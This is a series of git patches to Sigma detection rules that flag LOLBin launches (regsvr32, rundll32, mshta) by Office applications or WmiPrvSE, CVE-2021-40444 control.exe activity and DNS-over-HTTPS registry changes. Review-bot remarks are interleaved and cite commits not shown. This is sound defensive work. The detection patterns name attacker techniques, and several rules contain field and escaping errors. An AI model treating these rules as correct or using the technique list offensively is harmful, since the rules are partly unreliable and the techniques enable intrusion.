+++ b/rules/windows/sysmon/Monitor_LOLBins_Process_Creations_by_Office_applications.yml @@ -11,27 +11,25 @@ tags: - attack.execution - attack.defence_evasion status: experimental -Date: 2021/23/8 +Date: 2021/08/23 logsource: product: Windows category: process_creation detection: #useful_information: add more LOLBins to the rules logic of your choice. selection1: - EventID: 1 - selection2: Image|endswith: - 'regsvr32' - 'rundll32' - 'msiexec' - 'mshta' - 'verclsid' - selection3: + selection2: ParentImage|endswith: - winword.exe - excel.exe - powerpnt.exe - condition: selection1 AND selection2 AND selection3 + condition: selection1 AND selection2 falsepositives: - Unknown level: high From 13e626205547de12bc9f59c5786f78b6d9f38e41 Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Tue, 7 Sep 2021 21:20:51 -0600 Subject: [PATCH 0782/1367] Completed Changes Based on Comments Removed : unnecessary event ID --- ...ins_process_creations_with_Wmiprvse_parent_process.yml | 8 +++----- 1 file changed, 3 insertions(+), 5 deletions(-) diff --git a/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml b/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml index 5423077e..cf7a2801 100644 --- a/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml +++ b/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml 
@@ -11,25 +11,23 @@ tags: - attack.execution - attack.defence_evasion status: experimental -Date: 2021/23/8 +Date: 2021/08/23 logsource: product: Windows category: process_creation detection: #useful_information: add more LOLBins to the rules logic of your choice. selection1: - EventID: 1 - selection2: Image|endswith: - 'regsvr32' - 'rundll32' - 'msiexec' - 'mshta' - 'verclsid' - selection3: + selection2: ParentImage|endswith: - "\\wbem\\WmiPrvSE.exe" - condition: selection1 AND selection2 AND selection3 + condition: selection1 AND selection2 falsepositives: - FPs are possible here, but some LOLBins weren't excluded for obvious reasons. level: high From 8d47f9531be02d712eaa6d3f0b52aa47dc144dde Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Tue, 7 Sep 2021 21:22:01 -0600 Subject: [PATCH 0783/1367] Completed Changes Based on Comments Removed : unnecessary event ID --- ...ns_from_proxy_executing_regsvr32_with_payload.yml | 12 +++++------- 1 file changed, 5 insertions(+), 7 deletions(-) diff --git a/rules/windows/sysmon/Monitor_Office_Applications_from_proxy_executing_regsvr32_with_payload.yml b/rules/windows/sysmon/Monitor_Office_Applications_from_proxy_executing_regsvr32_with_payload.yml index 6ee87b6c..ecb11a21 100644 --- a/rules/windows/sysmon/Monitor_Office_Applications_from_proxy_executing_regsvr32_with_payload.yml +++ b/rules/windows/sysmon/Monitor_Office_Applications_from_proxy_executing_regsvr32_with_payload.yml 
@@ -11,37 +11,35 @@ tags: - attack.execution - attack.defence_evasion status: experimental -Date: 2021/23/8 +Date: 2021/08/23 logsource: product: Windows category: process_creation detection: #useful_information: add more LOLBins to the rules logic of your choice. selection1: - EventID: 1 - selection2: - Image: '*\wbem\WMIC.exe' - ProcessCommandLine: '*wmic *' - OriginalFileName: 'wmic.exe' - Description: 'WMI Commandline Utility' - selection3: + selection2: CommandLine|contains: - 'regsvr32' - 'rundll32' - 'msiexec' - 'mshta' - 'verclsid' - selection4: + selection3: ParentImage|endswith: - winword.exe - excel.exe - powerpnt.exe - selection5: + selection4: processCommandLine|contains|all: - 'process' - 'create' - 'call' - condition: selection1 AND selection2 AND selection3 AND selection4 AND selection5 + condition: selection1 AND selection2 AND selection3 AND selection4 falsepositives: - Unknown level: high From 4130ceb208f34b2445641a95f8049a090a5af9c9 Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Tue, 7 Sep 2021 21:25:52 -0600 Subject: [PATCH 0784/1367] Completed Changes Based on Comments Removed : unnecessary event ID --- ...ation_by_Office_applications_using_file_extentions.yml | 8 +++----- 1 file changed, 3 insertions(+), 5 deletions(-) diff --git a/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml b/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml index 0193aefe..4a12d0f7 100644 --- a/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml +++ b/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml 
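Review bot: After the renumbering this one rule names the command line three different ways — `ProcessCommandLine: '*wmic *'` in selection1, `CommandLine|contains:` in selection2 and `processCommandLine|contains|all:` in selection4 — and only `CommandLine` is the Sigma process_creation field, so selections 1 and 4 will not map. Selection1 is also a list (`- Image: …`, `- ProcessCommandLine: …`, `- OriginalFileName: …`, `- Description: …`), which is OR semantics, so `Description: 'WMI Commandline Utility'` alone satisfies it; if all four identify wmic.exe they belong in a single map. The `'*\wbem\WMIC.exe'` wildcard form is what PATCH 0797 later replaces with `Image|endswith: '\wbem\WMIC.exe'` for the process_creation copy, and the same change fits here.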
@@ -11,20 +11,18 @@ tags: - attack.execution - attack.defence_evasion status: experimental -Date: 2021/23/8 +Date: 2021/08/23 logsource: product: Windows category: process_creation detection: #useful_information: Please add more file extentions to the logic of your choice. selection1: - EventID: 11 - selection2: Image|endswith: - 'winword.exe' - 'excel.exe' - 'powerpnt.exe' - selection3: + selection2: TargetFileName|endswith: - ".exe" - ".dll" @@ -36,7 +34,7 @@ detection: - ".bat" - ".scr" - ".proj" - condition: selection1 AND selection2 AND selection3 + condition: selection1 AND selection2 falsepositives: - Unknown level: high From e3b376e94596d47855683590aac6822ea2fdd5ba Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Tue, 7 Sep 2021 21:26:42 -0600 Subject: [PATCH 0785/1367] Completed Changes Based on Comments Removed : unnecessary event ID --- .../Office_Applications_Spawning_WMI_command-line.yml | 8 +++----- 1 file changed, 3 insertions(+), 5 deletions(-) diff --git a/rules/windows/sysmon/Office_Applications_Spawning_WMI_command-line.yml b/rules/windows/sysmon/Office_Applications_Spawning_WMI_command-line.yml index 74777966..c38173bf 100644 --- a/rules/windows/sysmon/Office_Applications_Spawning_WMI_command-line.yml +++ b/rules/windows/sysmon/Office_Applications_Spawning_WMI_command-line.yml 
@@ -11,25 +11,23 @@ tags: - attack.execution - attack.defence_evasion status: experimental -Date: 2021/23/8 +Date: 2021/08/23 logsource: product: windows category: process_creation detection: #useful_information: Add more office applications to the rule logic of choice selection1: - EventID: 1 - selection2: - Image: '\wbem\WMIC.exe' - CommandLine: '*wmic *' - OriginalFileName: 'wmic.exe' - Description: 'WMI Commandline Utility' - selection3: + selection2: - ParentPrcessName|endswith: - winword.exe - excel.exe - powerpnt.exe - condition: selection1 AND selection2 AND selection3 + condition: selection1 AND selection2 falsepositives: - Unknown level: high From c9b4f5d3261e41e1107f1bcc6169174dff63f893 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Wed, 8 Sep 2021 16:49:49 +0200 Subject: [PATCH 0786/1367] CVE-2021-40444 --- .../win_susp_control_cve_2021_40444.yml | 30 +++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 rules/windows/process_creation/win_susp_control_cve_2021_40444.yml diff --git a/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml b/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml new file mode 100644 index 00000000..03b75f38 --- /dev/null +++ b/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml 
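Review bot: The renamed selection2 keeps the misspelled field `ParentPrcessName|endswith`, which no backend field mapping will recognise; it should be `ParentImage|endswith:` as in the other rules of this series. In selection1, `Image: '\wbem\WMIC.exe'` has neither a wildcard nor a modifier, so it is an exact match against the full image path and cannot fire; `Image|endswith: '\wbem\WMIC.exe'` is the intended form. Selection1 is also a YAML list, so its four items are OR'd rather than AND'd.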
@@ -0,0 +1,30 @@ +title: CVE-2021-40444 Process Pattern +id: 894397c6-da03-425c-a589-3d09e7d1f750 +description: Detects a suspicious process pattern found in CVE-2021-40444 exploitation +status: experimental +references: + - https://twitter.com/neonprimetime/status/1435584010202255375 + - https://www.joesandbox.com/analysis/476188/1/iochtml +author: '@neonprimetime, Florian Roth' +date: 2021/09/08 +tags: + - cve.2021.40444 +logsource: + category: process_creation + product: windows +detection: + selection: + Image|endswith: '\control.exe' + CommandLine|contains: + - '\AppData\' + - '\Temp\' + - '\ProgramData\' + - '\Users\Public\' + ParentImage|endswith: + - '\winword.exe' + - '\powerpnt.exe' + - '\excel.exe' + condition: selection +falsepositives: + - Unknown +level: high From e388bc6bfa9734683830c2531443ea591c8f937a Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Wed, 8 Sep 2021 16:56:04 +0200 Subject: [PATCH 0787/1367] remove unsupported tag --- .../process_creation/win_susp_control_cve_2021_40444.yml | 2 -- 1 file changed, 2 deletions(-) diff --git a/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml b/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml index 03b75f38..8a284b08 100644 --- a/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml +++ b/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml @@ -7,8 +7,6 @@ references: - https://www.joesandbox.com/analysis/476188/1/iochtml author: '@neonprimetime, Florian Roth' date: 2021/09/08 -tags: - - cve.2021.40444 logsource: category: process_creation product: windows From 847b8f49b4ca8295eb58b02ef6d9655d13e6b411 Mon Sep 17 00:00:00 2001 
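Review bot: Once the second hunk on this line drops `cve.2021.40444`, the new rule carries no `tags:` at all and will not surface in ATT&CK-based views; `tags:` with `- attack.execution` and `- attack.t1203` (Exploitation for Client Execution) fits a document-triggered exploit chain. The `falsepositives: - Unknown` entry would also benefit from naming the benign case the pattern covers, Office opening a Control Panel item on the user's behalf.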
From: Sittikorn S <61369934+BlackB0lt@users.noreply.github.com> Date: Wed, 8 Sep 2021 22:22:53 +0700 Subject: [PATCH 0788/1367] Update sysmon_dns_over_https_enabled.yml Remove HKEY_LOCAL_MACHINE\ and revise Firefox object --- .../registry_event/sysmon_dns_over_https_enabled.yml | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml b/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml index c7687eed..04f3a0b3 100644 --- a/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml +++ b/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml @@ -1,6 +1,7 @@ title: DNS-over-HTTPS Enabled by Registry id: 04b45a8a-d11d-49e4-9acc-4a1b524407a5 date: 2021/07/22 +modified: 2021/09/08 description: Detects when a user enables DNS-over-HTTPS. This can be used to hide internet activity or be used to hide the process of exfiltrating data. With this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors. author: Austin Songer status: experimental @@ -8,6 +9,7 @@ references: - https://www.tenforums.com/tutorials/151318-how-enable-disable-dns-over-https-doh-microsoft-edge.html - https://github.com/elastic/detection-rules/issues/1371 - https://chromeenterprise.google/policies/?policy=DnsOverHttpsMode + - https://admx.help/HKLM/Software/Policies/Mozilla/Firefox/DNSOverHTTPS tags: - attack.defense_evasion - attack.t1140 
@@ -17,13 +19,13 @@ logsource: category: registry_event detection: selection1: - TargetObject: 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Edge\BuiltInDnsClientEnabled' + TargetObject: '\SOFTWARE\Policies\Microsoft\Edge\BuiltInDnsClientEnabled' Details: 'DWORD (1)' selection2: - TargetObject: 'HKEY_LOCAL_MACHINE\SOFTWARE\Google\Chrome\DnsOverHttpsMode' + TargetObject: 'E\SOFTWARE\Google\Chrome\DnsOverHttpsMode' Details: 'DWORD (secure)' selection3: - TargetObject: 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Mozilla\Firefox\DNSOverHTTPS' + TargetObject: '\SOFTWARE\Policies\Mozilla\Firefox\DNSOverHTTPS\Enabled' Details: 'DWORD (1)' condition: selection1 or selection2 or selection3 falsepositives: From c633e825e071e9c53d7cb2644a0c105c134f60aa Mon Sep 17 00:00:00 2001 From: Sittikorn S <61369934+BlackB0lt@users.noreply.github.com> Date: Wed, 8 Sep 2021 22:23:51 +0700 Subject: [PATCH 0789/1367] Update sysmon_dns_over_https_enabled.yml --- rules/windows/registry_event/sysmon_dns_over_https_enabled.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml b/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml index 04f3a0b3..695cc190 100644 --- a/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml +++ b/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml @@ -22,7 +22,7 @@ detection: TargetObject: '\SOFTWARE\Policies\Microsoft\Edge\BuiltInDnsClientEnabled' Details: 'DWORD (1)' selection2: - TargetObject: 'E\SOFTWARE\Google\Chrome\DnsOverHttpsMode' + TargetObject: '\SOFTWARE\Google\Chrome\DnsOverHttpsMode' Details: 'DWORD (secure)' selection3: TargetObject: '\SOFTWARE\Policies\Mozilla\Firefox\DNSOverHTTPS\Enabled' From b1540d65b9b5c6cb05f1a2ea7d0dfb177028c9f6 Mon Sep 17 00:00:00 2001 
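Review bot: The `Details` values are unlikely to match what Sysmon event 13 records: Sysmon renders REG_DWORD data in hexadecimal as `DWORD (0x00000001)`, not `DWORD (1)`, and Chrome's `DnsOverHttpsMode` policy is a string value, so `DWORD (secure)` cannot be what is logged — for a REG_SZ the Details field holds the string itself. Consider `Details: 'DWORD (0x00000001)'` for the Edge and Firefox selections and `Details: 'secure'` for Chrome, confirmed against a captured event. The later hunks in this series (PATCH 0789 and PATCH 0794) fix the `E\SOFTWARE` typo and add `|endswith`, but leave `Details` untouched.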
From: Florian Roth Date: Wed, 8 Sep 2021 17:35:50 +0200 Subject: [PATCH 0790/1367] refactor: simplified rule --- .../process_creation/win_susp_control_cve_2021_40444.yml | 5 ----- 1 file changed, 5 deletions(-) diff --git a/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml b/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml index 8a284b08..b21c7012 100644 --- a/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml +++ b/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml @@ -13,11 +13,6 @@ logsource: detection: selection: Image|endswith: '\control.exe' - CommandLine|contains: - - '\AppData\' - - '\Temp\' - - '\ProgramData\' - - '\Users\Public\' ParentImage|endswith: - '\winword.exe' - '\powerpnt.exe' From af8bf06b3015f031df6f3cd28d5c8e9aa91fc709 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Wed, 8 Sep 2021 20:14:49 +0200 Subject: [PATCH 0791/1367] add missing tags --- .../windows/process_creation/process_mailboxexport_share.yml | 3 +++ rules/windows/process_creation/win_apt_hafnium.yml | 4 ++++ rules/windows/process_creation/win_malware_conti_7zip.yml | 3 +++ rules/windows/process_creation/win_malware_formbook.yml | 3 +++ rules/windows/process_creation/win_reg_add_run_key.yml | 3 +++ .../windows/process_creation/win_susp_psexex_paexec_flags.yml | 3 +++ rules/windows/process_creation/win_susp_renamed_debugview.yml | 3 +++ rules/windows/process_creation/win_susp_renamed_paexec.yml | 3 +++ .../windows/process_creation/win_susp_rundll32_no_params.yml | 3 +++ rules/windows/process_creation/win_susp_service_dir.yml | 3 +++ rules/windows/process_creation/win_susp_splwow64.yml | 3 +++ rules/windows/process_creation/win_susp_vbscript_unc2452.yml | 4 ++++ 12 files changed, 38 insertions(+) diff --git a/rules/windows/process_creation/process_mailboxexport_share.yml b/rules/windows/process_creation/process_mailboxexport_share.yml index da6aba61..aaa722fa 100644 
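Review bot: With the `CommandLine|contains` paths removed, any `control.exe` spawned by winword/excel/powerpnt matches, yet `falsepositives` still reads `Unknown` and `level: high` is unchanged, so analysts get no hint about how often Office legitimately launches Control Panel applets. Add `modified: 2021/09/08` to record the change and describe the benign case in `falsepositives`. The rule's `title`/`id` lines are above this hunk.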
--- a/rules/windows/process_creation/process_mailboxexport_share.yml +++ b/rules/windows/process_creation/process_mailboxexport_share.yml @@ -24,3 +24,6 @@ level: critical fields: - CommandLine - ParentCommandLine +tags: + attack.collection + attack.t1114 \ No newline at end of file diff --git a/rules/windows/process_creation/win_apt_hafnium.yml b/rules/windows/process_creation/win_apt_hafnium.yml index 14772b4b..30c41f2b 100644 --- a/rules/windows/process_creation/win_apt_hafnium.yml +++ b/rules/windows/process_creation/win_apt_hafnium.yml @@ -70,3 +70,7 @@ detection: falsepositives: - Unknown level: high +tags: + - attack.persistence + - attack.t1546 + - attack.t1053 \ No newline at end of file diff --git a/rules/windows/process_creation/win_malware_conti_7zip.yml b/rules/windows/process_creation/win_malware_conti_7zip.yml index 15198fae..aff67440 100644 --- a/rules/windows/process_creation/win_malware_conti_7zip.yml +++ b/rules/windows/process_creation/win_malware_conti_7zip.yml @@ -19,3 +19,6 @@ detection: falsepositives: - Unknown level: high +tags: + - attack.collection + - attack.t1560 \ No newline at end of file diff --git a/rules/windows/process_creation/win_malware_formbook.yml b/rules/windows/process_creation/win_malware_formbook.yml index d30851ea..fd1207ca 100644 --- a/rules/windows/process_creation/win_malware_formbook.yml +++ b/rules/windows/process_creation/win_malware_formbook.yml @@ -49,3 +49,6 @@ fields: falsepositives: - Unknown level: critical +tags: + - attack.develop_capabilities + - attack.t1587.001 \ No newline at end of file diff --git a/rules/windows/process_creation/win_reg_add_run_key.yml b/rules/windows/process_creation/win_reg_add_run_key.yml index 0cd6b854..ef9ededa 100644 --- a/rules/windows/process_creation/win_reg_add_run_key.yml +++ b/rules/windows/process_creation/win_reg_add_run_key.yml 
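Review bot: `attack.develop_capabilities` / `attack.t1587.001` on `win_malware_formbook.yml` (and on `win_susp_psexex_paexec_flags.yml` in the next hunk) tags a Resource Development technique, which describes adversary preparation outside the victim's telemetry; a process-creation rule is better tagged with what it observes, e.g. `attack.execution` for Formbook and `attack.execution` plus `attack.t1569.002` (Service Execution) for the PsExec/PAExec flags. Appending `tags:` after `level:` with `\ No newline at end of file` also departs from the layout used elsewhere in this series, where `tags:` precedes `logsource:`, and the missing trailing newline should be restored regardless. For `win_apt_hafnium.yml` it is worth checking that the rule has no `tags:` block above the hunk, since the duplicate-key problem appears in `win_susp_vbscript_unc2452.yml` in this same commit.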
@@ -20,3 +20,6 @@ detection: falsepositives: - Unknown level: medium +tags: + - attack.persistence + - attack.t1547.001 \ No newline at end of file diff --git a/rules/windows/process_creation/win_susp_psexex_paexec_flags.yml b/rules/windows/process_creation/win_susp_psexex_paexec_flags.yml index 404f2d7a..51926aa0 100644 --- a/rules/windows/process_creation/win_susp_psexex_paexec_flags.yml +++ b/rules/windows/process_creation/win_susp_psexex_paexec_flags.yml @@ -32,3 +32,6 @@ falsepositives: - Weird admins that rename their tools - Software companies that bundle PsExec/PAExec with their software and rename it, so that it is less embarrassing level: high +tags: + - attack.develop_capabilities + - attack.t1587.001 \ No newline at end of file diff --git a/rules/windows/process_creation/win_susp_renamed_debugview.yml b/rules/windows/process_creation/win_susp_renamed_debugview.yml index f421c1cd..54c431bb 100644 --- a/rules/windows/process_creation/win_susp_renamed_debugview.yml +++ b/rules/windows/process_creation/win_susp_renamed_debugview.yml @@ -21,3 +21,6 @@ detection: falsepositives: - Unknown level: high +tags: + - attack.lateral_movement + - attack.discovery \ No newline at end of file diff --git a/rules/windows/process_creation/win_susp_renamed_paexec.yml b/rules/windows/process_creation/win_susp_renamed_paexec.yml index 7c51c620..06c4680f 100644 --- a/rules/windows/process_creation/win_susp_renamed_paexec.yml +++ b/rules/windows/process_creation/win_susp_renamed_paexec.yml @@ -24,3 +24,6 @@ falsepositives: - Weird admins that rename their tools - Software companies that bundle PAExec with their software and rename it, so that it is less embarrassing level: high +tags: + - attack.defense_evasion + - attack.t1202 \ No newline at end of file diff --git a/rules/windows/process_creation/win_susp_rundll32_no_params.yml b/rules/windows/process_creation/win_susp_rundll32_no_params.yml index b45e3b4e..b1a6486a 100644 
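Review bot: `win_susp_renamed_debugview.yml` receives only tactic tags (`attack.lateral_movement`, `attack.discovery`) with no technique, and `win_susp_renamed_paexec.yml` receives `attack.t1202` (Indirect Command Execution), whereas both rules detect a renamed tool, which is Masquerading — `attack.defense_evasion` with `attack.t1036` fits both. The same generic `t1202` is applied on the next line to `win_susp_rundll32_no_params.yml`, `win_susp_service_dir.yml` and `win_susp_splwow64.yml`; rundll32 abuse is `attack.t1218.011` (Signed Binary Proxy Execution: Rundll32), and the other two deserve a technique chosen from what each rule actually observes rather than a shared default.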
--- a/rules/windows/process_creation/win_susp_rundll32_no_params.yml +++ b/rules/windows/process_creation/win_susp_rundll32_no_params.yml @@ -25,3 +25,6 @@ fields: falsepositives: - Possible but rare level: high +tags: + - attack.defense_evasion + - attack.t1202 \ No newline at end of file diff --git a/rules/windows/process_creation/win_susp_service_dir.yml b/rules/windows/process_creation/win_susp_service_dir.yml index bc04c1e4..f435334e 100644 --- a/rules/windows/process_creation/win_susp_service_dir.yml +++ b/rules/windows/process_creation/win_susp_service_dir.yml @@ -30,3 +30,6 @@ detection: falsepositives: - Unknown level: high +tags: + - attack.defense_evasion + - attack.t1202 \ No newline at end of file diff --git a/rules/windows/process_creation/win_susp_splwow64.yml b/rules/windows/process_creation/win_susp_splwow64.yml index 38c4a4da..d18e5e6a 100644 --- a/rules/windows/process_creation/win_susp_splwow64.yml +++ b/rules/windows/process_creation/win_susp_splwow64.yml @@ -18,3 +18,6 @@ detection: falsepositives: - Unknown level: high +tags: + - attack.defense_evasion + - attack.t1202 \ No newline at end of file diff --git a/rules/windows/process_creation/win_susp_vbscript_unc2452.yml b/rules/windows/process_creation/win_susp_vbscript_unc2452.yml index d224ddbf..9e67d2a7 100644 --- a/rules/windows/process_creation/win_susp_vbscript_unc2452.yml +++ b/rules/windows/process_creation/win_susp_vbscript_unc2452.yml @@ -24,3 +24,7 @@ detection: falsepositives: - Unknown level: high +tags: +tags: + - attack.persistence + - attack.t1547.001 \ No newline at end of file From deb0ddfe096a8ec091a29dc84bae450bc11466f4 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Wed, 8 Sep 2021 20:16:53 +0200 Subject: [PATCH 0792/1367] fix duplicate tags --- rules/windows/process_creation/win_susp_vbscript_unc2452.yml | 1 - 1 file changed, 1 deletion(-) 
diff --git a/rules/windows/process_creation/win_susp_vbscript_unc2452.yml b/rules/windows/process_creation/win_susp_vbscript_unc2452.yml index 9e67d2a7..f440ffb2 100644 --- a/rules/windows/process_creation/win_susp_vbscript_unc2452.yml +++ b/rules/windows/process_creation/win_susp_vbscript_unc2452.yml @@ -24,7 +24,6 @@ detection: falsepositives: - Unknown level: high -tags: tags: - attack.persistence - attack.t1547.001 \ No newline at end of file From 8eb527d04285d865ad4aebae38fb121e83d2df91 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Wed, 8 Sep 2021 20:21:02 +0200 Subject: [PATCH 0793/1367] Update process_mailboxexport_share.yml --- .../windows/process_creation/process_mailboxexport_share.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/process_creation/process_mailboxexport_share.yml b/rules/windows/process_creation/process_mailboxexport_share.yml index aaa722fa..d0d62110 100644 --- a/rules/windows/process_creation/process_mailboxexport_share.yml +++ b/rules/windows/process_creation/process_mailboxexport_share.yml @@ -25,5 +25,5 @@ fields: - CommandLine - ParentCommandLine tags: - attack.collection - attack.t1114 \ No newline at end of file + - attack.collection + - attack.t1114 \ No newline at end of file From 36ed5ee9d4d45159af21a8a89575e699c0e9b2c1 Mon Sep 17 00:00:00 2001 From: Sittikorn S <61369934+BlackB0lt@users.noreply.github.com> Date: Thu, 9 Sep 2021 08:04:54 +0700 Subject: [PATCH 0794/1367] Update sysmon_dns_over_https_enabled.yml --- .../sysmon_dns_over_https_enabled.yml | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml b/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml index 695cc190..c5138d2b 100644 --- a/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml +++ b/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml 
@@ -18,16 +18,16 @@ logsource: product: windows category: registry_event detection: - selection1: - TargetObject: '\SOFTWARE\Policies\Microsoft\Edge\BuiltInDnsClientEnabled' + selection_edge: + TargetObject|endswith: '\SOFTWARE\Policies\Microsoft\Edge\BuiltInDnsClientEnabled' Details: 'DWORD (1)' - selection2: - TargetObject: '\SOFTWARE\Google\Chrome\DnsOverHttpsMode' + selection_chrome: + TargetObject|endswith: '\SOFTWARE\Google\Chrome\DnsOverHttpsMode' Details: 'DWORD (secure)' - selection3: - TargetObject: '\SOFTWARE\Policies\Mozilla\Firefox\DNSOverHTTPS\Enabled' + selection_firefox: + TargetObject|endswith: '\SOFTWARE\Policies\Mozilla\Firefox\DNSOverHTTPS\Enabled' Details: 'DWORD (1)' - condition: selection1 or selection2 or selection3 + condition: selection_edge or selection_chrome or selection_firefox falsepositives: - Unlikely level: medium From 6ddc83901b53b00f9126d8c9284efc775a560d81 Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Wed, 8 Sep 2021 20:38:07 -0600 Subject: [PATCH 0795/1367] Changed Category Category Changed from process_creation to file_event --- ...es_creation_by_Office_applications_using_file_extentions.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml b/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml index 4a12d0f7..55229ae7 100644 --- a/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml +++ b/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml 
@@ -14,7 +14,7 @@ status: experimental Date: 2021/08/23 logsource: product: Windows - category: process_creation + category: file_event detection: #useful_information: Please add more file extentions to the logic of your choice. selection1: From 1f577174f96b1481cae7dbbaa35f9e308ef0bb94 Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Wed, 8 Sep 2021 21:06:41 -0600 Subject: [PATCH 0796/1367] Changed endswith condition removed double // from "\wbem\WmiPrvSE.exe" --- ...r_LOLBins_process_creations_with_Wmiprvse_parent_process.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml b/rules/windows/process_creation/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml index 1301950c..5404a30d 100644 --- a/rules/windows/process_creation/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml +++ b/rules/windows/process_creation/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml @@ -26,7 +26,7 @@ detection: - 'verclsid' selection2: ParentImage|endswith: - - "\\wbem\\WmiPrvSE.exe" + - "\wbem\WmiPrvSE.exe" condition: selection1 AND selection2 falsepositives: - Unknown From a3236e62a26bde38a346a5a3b13e3ef3cae1b2ed Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Wed, 8 Sep 2021 21:10:47 -0600 Subject: [PATCH 0797/1367] Changed selection2 conditions replaced *\wbem\WMIC.exe with Image|endswith: '\wbem\WMIC.exe' and ProcessCommandLine: *wmic * with ProcessCommandLine|contains: 'wmic ' --- ...Application_from_proxy executing_regsvr32_with_payload.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) 
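Review bot: The context lines `Date: 2021/08/23` and `product: Windows` in this hunk do not follow the Sigma schema, which expects the lowercase `date:` key and `product: windows`; a capitalised `Date` is a different key and will likely be rejected by the repository's rule checks rather than read as the rule's date. The same two lines appear in the process_creation copy of this rule in the hunk on L1279 (commit 0800), while a later commit in this series (0805, L1282) makes the `date:` fix for the sysmon LOLBins rule only.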
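Review bot: The new line `- "\wbem\WmiPrvSE.exe"` is a YAML double-quoted scalar, and `\w` is not a valid escape sequence in that quoting style, so the file will no longer parse; the `\\` the commit removes was the correct spelling inside double quotes. Either keep the doubled backslashes or drop the double quotes, e.g. `- '\wbem\WmiPrvSE.exe'`, since single-quoted scalars take backslashes literally. The same change is made to the sysmon copy in commit 0801 (L1280); commits 0804 and 0805 later in the series switch both files to an unquoted plain scalar, which parses correctly.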
